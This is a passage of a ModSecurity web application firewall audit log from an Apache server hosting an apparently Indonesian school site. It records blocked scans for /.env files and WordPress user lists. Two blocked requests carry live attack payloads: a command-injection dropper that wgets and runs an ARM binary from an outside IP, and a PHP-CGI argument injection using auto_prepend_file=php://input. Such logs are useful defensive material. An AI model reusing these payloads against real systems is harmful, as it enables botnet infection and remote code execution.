"ENABLED" --9650565d-Z-- --4fda690a-A-- [24/May/2025:05:47:39 +0700] aDD7C_mzt4abyoi_U9lwkQAAAIY 103.236.140.4 44604 103.236.140.4 8181 --4fda690a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 204.48.19.8 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 204.48.19.8 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept-Charset: utf-8 --4fda690a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4fda690a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748040459018649 870 (- - -) Stopwatch2: 1748040459018649 870; combined=364, p1=303, p2=0, p3=0, p4=0, p5=61, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4fda690a-Z-- --e5d07c3f-A-- [24/May/2025:05:57:21 +0700] aDD9UeO2UzDOKMmK0i4vmgAAABM 103.236.140.4 45740 103.236.140.4 8181 --e5d07c3f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.22.212.94 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.22.212.94 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (iPhone; U; CPU iPhone OS) (compatible; Googlebot-Mobile/2.1; http://www.google.com/bot.html) Accept-Charset: utf-8 --e5d07c3f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e5d07c3f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748041041566342 891 (- - -) Stopwatch2: 1748041041566342 891; combined=344, p1=301, p2=0, p3=0, p4=0, p5=43, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e5d07c3f-Z-- --3f344a5c-A-- [24/May/2025:06:12:07 +0700] aDEAxzvI5DIWBJ2mFG7OiwAAAMw 103.236.140.4 45836 103.236.140.4 8181 --3f344a5c-B-- GET / HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 166.108.238.236 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 166.108.238.236 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0 Proxy-Connection: close --3f344a5c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3f344a5c-H-- Message: Access denied with code 403 (phase 2). Matched phrase "/Proxy-Connection/" at TX:header_name. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "33"] [id "210740"] [rev "2"] [msg "COMODO WAF: HTTP header is restricted by policy||smkn22-jkt.sch.id|F|4"] [data "/Proxy-Connection/"] [severity "WARNING"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748041927852363 3218 (- - -) Stopwatch2: 1748041927852363 3218; combined=1177, p1=538, p2=550, p3=0, p4=0, p5=89, sr=141, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3f344a5c-Z-- --5ead9a25-A-- [24/May/2025:06:25:25 +0700] aDED5eunkxaVeh4NwhZZggAAAEc 103.236.140.4 46002 103.236.140.4 8181 --5ead9a25-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 202.178.114.226 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.178.114.226 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --5ead9a25-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5ead9a25-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748042725054614 3571 (- - -) Stopwatch2: 1748042725054614 3571; combined=1492, p1=493, p2=961, p3=0, p4=0, p5=38, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5ead9a25-Z-- --c0050b6c-A-- [24/May/2025:06:28:09 +0700] aDEEiTvI5DIWBJ2mFG7OjwAAANA 103.236.140.4 46018 103.236.140.4 8181 --c0050b6c-B-- POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20-rf%20neon.arm7%3B%20wget%20http%3A%2F%2F209.141.34.106%2Fdwrioej%2Fneon.arm7%3B%20chmod%20777%20neon.arm7%3B%20.%2Fneon.arm7%20router1 HTTP/1.0 Host: 103.236.140.4 Cookie: uid=1 X-Real-IP: 176.65.148.236 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.148.236 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozila/5.0 --c0050b6c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c0050b6c-H-- Message: Access denied with code 403 (phase 1). Operator EQ matched 0 at REQUEST_HEADERS. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "41"] [id "210280"] [rev "4"] [msg "COMODO WAF: HTTP/1.0 POST request missing Content-Length Header||103.236.140.4|F|4"] [data "0"] [severity "WARNING"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748042889233528 894 (- - -) Stopwatch2: 1748042889233528 894; combined=380, p1=333, p2=0, p3=0, p4=0, p5=47, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c0050b6c-Z-- --e7840355-A-- [24/May/2025:06:43:45 +0700] aDEIMeO2UzDOKMmK0i4vwwAAAA4 103.236.140.4 46200 103.236.140.4 8181 --e7840355-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.39.139.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.39.139.222 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --e7840355-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e7840355-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748043825595763 3518 (- - -) Stopwatch2: 1748043825595763 3518; combined=1536, p1=549, p2=955, p3=0, p4=0, p5=32, sr=124, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e7840355-Z-- --3d166708-A-- [24/May/2025:07:02:38 +0700] aDEMnvmzt4abyoi_U9lx9wAAAI8 103.236.140.4 46376 103.236.140.4 8181 --3d166708-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 178.18.250.175 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.18.250.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --3d166708-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3d166708-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748044958312594 3258 (- - -) Stopwatch2: 1748044958312594 3258; combined=1402, p1=439, p2=932, p3=0, p4=0, p5=30, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3d166708-Z-- --b8e1c87f-A-- [24/May/2025:07:43:09 +0700] aDEWHeO2UzDOKMmK0i4wTgAAABQ 103.236.140.4 49834 103.236.140.4 8181 --b8e1c87f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 185.136.192.166 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.136.192.166 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --b8e1c87f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b8e1c87f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748047389754251 3388 (- - -) Stopwatch2: 1748047389754251 3388; combined=1445, p1=491, p2=921, p3=0, p4=0, p5=33, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b8e1c87f-Z-- --4e201672-A-- [24/May/2025:07:56:51 +0700] aDEZUzvI5DIWBJ2mFG7Q6gAAAMo 103.236.140.4 49956 103.236.140.4 8181 --4e201672-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 202.84.79.86 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.84.79.86 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --4e201672-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4e201672-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748048211490901 2488 (- - -) Stopwatch2: 1748048211490901 2488; combined=1222, p1=406, p2=788, p3=0, p4=0, p5=28, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4e201672-Z-- --7f3d2b7b-A-- [24/May/2025:08:14:41 +0700] aDEdgTvI5DIWBJ2mFG7RBAAAAMc 103.236.140.4 50116 103.236.140.4 8181 --7f3d2b7b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.138.16.24 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.138.16.24 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* --7f3d2b7b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7f3d2b7b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748049281215122 845 (- - -) Stopwatch2: 1748049281215122 845; combined=388, p1=356, p2=0, p3=0, p4=0, p5=32, sr=135, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7f3d2b7b-Z-- --7df98158-A-- [24/May/2025:09:06:16 +0700] aDEpmPmzt4abyoi_U9lywwAAAIU 103.236.140.4 50518 103.236.140.4 8181 --7df98158-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 44.222.26.87 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 44.222.26.87 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --7df98158-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7df98158-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748052376000038 3631 (- - -) Stopwatch2: 1748052376000038 3631; combined=1557, p1=572, p2=952, p3=0, p4=0, p5=32, sr=131, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7df98158-Z-- --86c34e3f-A-- [24/May/2025:09:24:13 +0700] aDEtzTvI5DIWBJ2mFG7RcgAAANQ 103.236.140.4 50636 103.236.140.4 8181 --86c34e3f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.80.158.251 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.80.158.251 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* --86c34e3f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --86c34e3f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748053453167304 868 (- - -) Stopwatch2: 1748053453167304 868; combined=354, p1=308, p2=0, p3=0, p4=0, p5=46, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --86c34e3f-Z-- --bbf1970d-A-- [24/May/2025:09:37:21 +0700] aDEw4TvI5DIWBJ2mFG7Y4QAAANI 103.236.140.4 36706 103.236.140.4 8181 --bbf1970d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.230.62.10 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.230.62.10 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --bbf1970d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bbf1970d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748054241377032 2378 (- - -) Stopwatch2: 1748054241377032 2378; combined=1006, p1=370, p2=615, p3=0, p4=0, p5=21, sr=53, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bbf1970d-Z-- --63da5939-A-- [24/May/2025:09:57:42 +0700] aDE1pjvI5DIWBJ2mFG7uZQAAAMw 103.236.140.4 48780 103.236.140.4 8181 --63da5939-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 92.55.190.215 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 92.55.190.215 X-Forwarded-Proto: http Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --63da5939-C-- --63da5939-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --63da5939-E-- --63da5939-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748055462862791 4331 (- - -) Stopwatch2: 1748055462862791 4331; combined=3051, p1=391, p2=2628, p3=0, p4=0, p5=32, sr=61, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --63da5939-Z-- --d9f40627-A-- [24/May/2025:10:02:41 +0700] aDE20fmzt4abyoi_U9mTGwAAAIQ 103.236.140.4 58578 103.236.140.4 8181 --d9f40627-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.87.236.138 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.87.236.138 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d9f40627-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d9f40627-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748055761475942 2300 (- - -) Stopwatch2: 1748055761475942 2300; combined=1049, p1=369, p2=656, p3=0, p4=0, p5=24, sr=52, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d9f40627-Z-- --ae9c4673-A-- [24/May/2025:10:31:24 +0700] aDE9jPmzt4abyoi_U9myOgAAAJQ 103.236.140.4 58004 103.236.140.4 8181 --ae9c4673-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.227.93.71 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.227.93.71 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --ae9c4673-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ae9c4673-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748057484153842 939 (- - -) Stopwatch2: 1748057484153842 939; combined=436, p1=389, p2=0, p3=0, p4=0, p5=47, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ae9c4673-Z-- --f038130e-A-- [24/May/2025:10:47:05 +0700] aDFBOeunkxaVeh4NwhajZgAAAEs 103.236.140.4 60720 103.236.140.4 8181 --f038130e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.184.99.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.184.99.163 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --f038130e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f038130e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748058425549045 2983 (- - -) Stopwatch2: 1748058425549045 2983; combined=1334, p1=487, p2=815, p3=0, p4=0, p5=32, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f038130e-Z-- --84d83b4c-A-- [24/May/2025:11:01:10 +0700] aDFEhuO2UzDOKMmK0i6ApAAAAAU 103.236.140.4 60208 103.236.140.4 8181 --84d83b4c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 36.95.88.229 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 36.95.88.229 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --84d83b4c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --84d83b4c-H-- Message: Access 